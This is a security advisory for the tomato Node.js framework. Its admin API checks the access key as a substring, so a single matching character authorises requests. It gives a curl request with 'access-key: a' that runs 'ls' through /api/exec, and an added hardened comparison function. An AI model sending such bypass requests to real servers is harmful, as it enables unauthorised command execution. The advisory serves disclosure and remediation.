Tomato is a Node.js web framework.
The tomato API has an admin service that is enabled by setting up an access_key in the config options. This access_key is intended to protect the API admin from unauthorized access.
The check tests whether the access_key provided in the request is contained within the configured access_key string, rather than testing whether the two are equal. A single character that appears anywhere in the configured access key is therefore sufficient to bypass this control.
Source: Node Security Project
Example:
This is the snippet of code that does the comparison to authorize requests.
if (access_key && config.master.api.access_key.indexOf(access_key) !== -1) {
For an access_key that is set to any string that includes the letter 'a', the following request would be authorized.
$ curl -X POST "http://localhost:8081/api/exec" -H "Content-Type: application/json" -d @test -H "access-key: a"
{
"cmd": "ls",
"path": ".",
"stdout": "app.js\nconfig.js\nlog\nnode_modules\nserver.js\n",
"stderr": ""
}
Mitigating factors:
The admin interface is disabled by default. The module author confirmed that access_key should really be an array of access keys; however, based on the variable name and documentation, it was not clear that it should be an array. The vulnerability exists only if a string access_key is set.
Module version 0.0.6 has been updated to ensure that an array of keys is provided, and its documentation has been updated as well.
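The following added example (not tomato's own code) shows why the quoted indexOf check behaves differently for a string and for an array configuration, next to a hardened check that rejects a non-array configuration and compares whole keys in constant time. The function names advisoryCheck, hardenedCheck and demo, and the sample key, are constructed for illustration.

```javascript
// Added illustration; not tomato's source. Names and key values are constructed.
const nodeCrypto = require('crypto');

// Same expression as the snippet quoted in the advisory. Its meaning depends
// on the type of `configured`: String.prototype.indexOf searches for a
// substring, Array.prototype.indexOf compares whole elements with ===.
function advisoryCheck(configured, supplied) {
  return Boolean(supplied && configured.indexOf(supplied) !== -1);
}

// Hardened check: refuse a misconfigured (non-array) key list instead of
// silently falling back to substring matching, and compare whole keys
// in constant time.
function hardenedCheck(configuredKeys, supplied) {
  if (!Array.isArray(configuredKeys) || configuredKeys.length === 0) {
    throw new TypeError('access_key must be a non-empty array of strings');
  }
  if (typeof supplied !== 'string' || supplied.length === 0) return false;
  const digest = (s) => nodeCrypto.createHash('sha256').update(s, 'utf8').digest();
  const suppliedDigest = digest(supplied);
  let ok = false;
  for (const key of configuredKeys) {
    // Hashing first yields equal-length buffers, which timingSafeEqual requires.
    if (typeof key === 'string' &&
        nodeCrypto.timingSafeEqual(digest(key), suppliedDigest)) {
      ok = true; // keep looping so timing does not reveal which key matched
    }
  }
  return ok;
}

const SAMPLE_KEY = 'constructed-sample-key'; // constructed value, contains 'a'

function demo() {
  return {
    stringConfigOneChar: advisoryCheck(SAMPLE_KEY, 'a'),          // true: substring match
    arrayConfigOneChar: advisoryCheck([SAMPLE_KEY], 'a'),         // false: element equality
    arrayConfigFullKey: advisoryCheck([SAMPLE_KEY], SAMPLE_KEY),  // true
    hardenedOneChar: hardenedCheck([SAMPLE_KEY], 'a'),            // false
    hardenedFullKey: hardenedCheck([SAMPLE_KEY], SAMPLE_KEY),     // true
  };
}

console.log(demo());
```

Failing closed on a string configuration turns the ambiguity described under the mitigating factors into a startup error rather than a weakened check.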